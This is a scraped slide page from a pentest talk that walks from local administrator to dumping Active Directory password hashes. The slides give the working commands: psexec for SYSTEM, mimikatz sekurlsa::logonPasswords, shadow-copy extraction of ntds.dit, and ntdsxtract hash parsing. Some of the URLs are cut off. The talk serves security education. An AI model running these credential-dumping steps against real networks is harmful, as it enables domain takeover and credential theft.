Fall of a domain | From local admin to Domain user hashes

50 %
50 %
Information about Fall of a domain | From local admin to Domain user hashes

Published on February 27, 2014

Author: null0x00



Author: Riyaz Walikar

The Fall of a Domain LOCAL ADMIN TO DOMAIN USER HASHES Riyaz Walikar

Disclaimer  It was far more painstaking and complicated than this!  Demo setup to show execution path  All the commands were actually used in the pentest  Please do not try this on your office/corporate environment without written permission

Please exercise caution!

The story so far  Remote RDP access to a machine on the client network via VPN  Local Administrator rights to simulate an employee  User is a limited domain user  Domain controller on the same network, reachable with LDAP services running

Visually. This.

Local Admin eh?  Locally logged in as TARDISfwhite  Domain limited user but local admin  Other users connected? [Task Manager > Users]  Found another user connected to our system via RDP –sweet! (possibly domain admin )  Need system privs! Any ideas?

Think Sysinternals!  psexec –s –i cmd.exe

Dump connected user credentials  mimikatz – Benjamin Delpy  Extracts plaintext passwords from memory  Wdigest, tspkg, kerberos and many more  mimikatz  privilege::debug  token::elevate  sekurlsa::logonPasswords

Windows (In)Security?

Now what?

Remote CMD anyone?  RDP directly!  Lets be discreet   psexec -s –u TARDISatomboy cmd.exe  Game already over!  Instead RDP with user credentials and present report

Lets grab some hashes   Active Directory stores user information in %systemroot%ntdsntds.dit  Locked during system usage  ntdsutil + snapshot = backup (> Windows 2008)  vssadmin create shadow /for=C: (> Windows 2003)

Lets grab some hashes   backup readable by nt authoritysystem and administrators  We need the ntds.dit and SYSTEM files  cd / dir /other inbuilt cmd commands do not work on unmounted volume shadow copies  copy works!

Core files needed

NTDS.dit structure parse?  NTDSXtract - A framework for offline forensic analysis of ntds.dit  Need the libesedb module as well  libesedb and creddump in  wget to a linux box (Kali is a good choice)

get framework + compile + make + run  wget  wget .zip  unzip both

get framework + compile + make + run  cd ntds_dump_hash/libesedb  ./configure && make  cd libesedb/esedbtools  ./esedbexport -l /tmp/ntds.log <ntds.dit>

Yay!  python ../../ntdsxtract/ datatable link_table --passwordhashes <system_file> – passwordhistory <system_file>  Cleanup the output with ( ter/

Now what?

Pass the hash / Password Cracking!  Use the Windows Credentials Editor – Amplia Security  Password Cracking >> Humla perhaps 

References   ml 

Thank you

Add a comment

Related presentations

Presentación que realice en el Evento Nacional de Gobierno Abierto, realizado los ...

In this presentation we will describe our experience developing with a highly dyna...

Presentation to the LITA Forum 7th November 2014 Albuquerque, NM

Un recorrido por los cambios que nos generará el wearabletech en el futuro

Um paralelo entre as novidades & mercado em Wearable Computing e Tecnologias Assis...

Microsoft finally joins the smartwatch and fitness tracker game by introducing the...

Related pages

.CA Domain Name Registration •

Why you need a .ca domain. Most Canadians think of .com websites as American, and the majority of Canadians prefer .ca for online shopping. There's no ...
Read more

University of Michigan - Wikipedia, the free encyclopedia

The University of Michigan's fight song, ...
Read more

Article View - United States Department of Defense

Official website for U.S. DEPARTMENT OF DEFENSE ... Navy SEAL to Receive Medal of Honor for Role In 2012 Hostage Rescue in Afghanistan
Read more

Bloom's taxonomy - Wikipedia, the free encyclopedia

Bloom's taxonomy is a set of three hierarchical models used to classify educational learning objectives into levels of complexity and mastery.
Read more

My Dolphin Show 7 Walkthrough - YouTube

Play My Dolphin Show 7 Game Now Here: Play Free Online Games, Gameplay and Walkthrough! http://www ...
Read more

Archives - — Tells the Facts, Names ...

from Counterpunch. Other Books Available from CounterPunch. Tweet; Email; Tweet; Email; Tweet; Email; Tweet; Email; Tweet; Email; Tweet; Email; Tweet ...
Read more

Advantages That an RODC Can Provide to an Existing Deployment

Advantages That an RODC Can Provide to an Existing Deployment. Updated: April 26, 2012. Applies To: Windows Server 2008, Windows Server 2012.
Read more

Resolve a DOI Name

Type or paste a DOI name into the text box. Click Go. Your browser will take you to a Web page (URL) associated with that DOI name. Send questions or ...
Read more

Microsoft Aligning Azure Active Directory for Windows 10 ...

Microsoft Aligning Azure Active Directory for Windows 10 Mobile Device Management Scenarios. By Kurt Mackie; 05/29/2015; Microsoft is bringing a little ...
Read more